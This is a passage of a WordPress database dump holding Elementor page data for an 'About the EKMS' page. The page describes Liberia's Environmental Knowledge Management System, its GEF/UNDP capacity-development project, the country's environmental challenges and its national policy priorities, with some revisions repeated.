governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4>\\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).<\\/p>\\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.<\\/p>\\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.<\\/p>\\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.<\\/p>\\n<p>The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).<\\/p>\\n<p>Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.<\\/p>\\n<p>This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\\n<ul>\\n<li>Peace, Security, Rule of Law<\\/li>\\n<li>Sustainable Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Inclusive Governance and Public Institutions<\\/li>\\n<\\/ul>\\n<p>The UNDAF (One Programme) also aligns with Liberia\\u2019s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:<\\/p>\\n<ul>\\n<li>Peace, Security and Rule of Law<\\/li>\\n<li>Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Governance and Public Institutions<\\/li>\\n<li>Cross-cutting issues<\\/li>\\n<\\/ul>\\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information\\/data.<\\/p>\\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.<\\/p>\\n<h4>A.4 Baseline Scenario and Associated Baseline Projects<\\/h4>\\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country\\u2019s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia\\u2019s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia\\u2019s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).\\u00a0<\\/p>\\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.\\u00a0<\\/p>\\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.\\u00a0<\\/p>\\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.\\u00a0<\\/p>\\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.<\\/p><p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships.  Relevant completed UNDP GEF projects that form the baseline of this project include:<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5d55e03\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12087,1964,'_elementor_edit_mode','builder'),(12088,1964,'_elementor_template_type','wp-page'),(12089,1964,'_elementor_version','2.7.5'),(12090,1964,'_wp_page_template','default'),(12091,1964,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4>\\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).<\\/p>\\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.<\\/p>\\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.<\\/p>\\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.<\\/p>\\n<p>The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).<\\/p>\\n<p>Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.<\\/p>\\n<p>This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\\n<ul>\\n<li>Peace, Security, Rule of Law<\\/li>\\n<li>Sustainable Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Inclusive Governance and Public Institutions<\\/li>\\n<\\/ul>\\n<p>The UNDAF (One Programme) also aligns with Liberia\\u2019s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:<\\/p>\\n<ul>\\n<li>Peace, Security and Rule of Law<\\/li>\\n<li>Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Governance and Public Institutions<\\/li>\\n<li>Cross-cutting issues<\\/li>\\n<\\/ul>\\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information\\/data.<\\/p>\\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.<\\/p>\\n<h4>A.4 Baseline Scenario and Associated Baseline Projects<\\/h4>\\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country\\u2019s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia\\u2019s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia\\u2019s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).\\u00a0<\\/p>\\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.\\u00a0<\\/p>\\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.\\u00a0<\\/p>\\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.\\u00a0<\\/p>\\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.<\\/p><p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships.  Relevant completed UNDP GEF projects that form the baseline of this project include:<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcde0a7\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee75b34\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"71ce863\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f710f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5403a84\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"5a46832\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9ac7a19\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5d55e03\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12094,1965,'_elementor_edit_mode','builder'),(12095,1965,'_elementor_template_type','wp-page'),(12096,1965,'_elementor_version','2.7.5'),(12097,1965,'_wp_page_template','default'),(12098,1965,'_elementor_data','[{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" 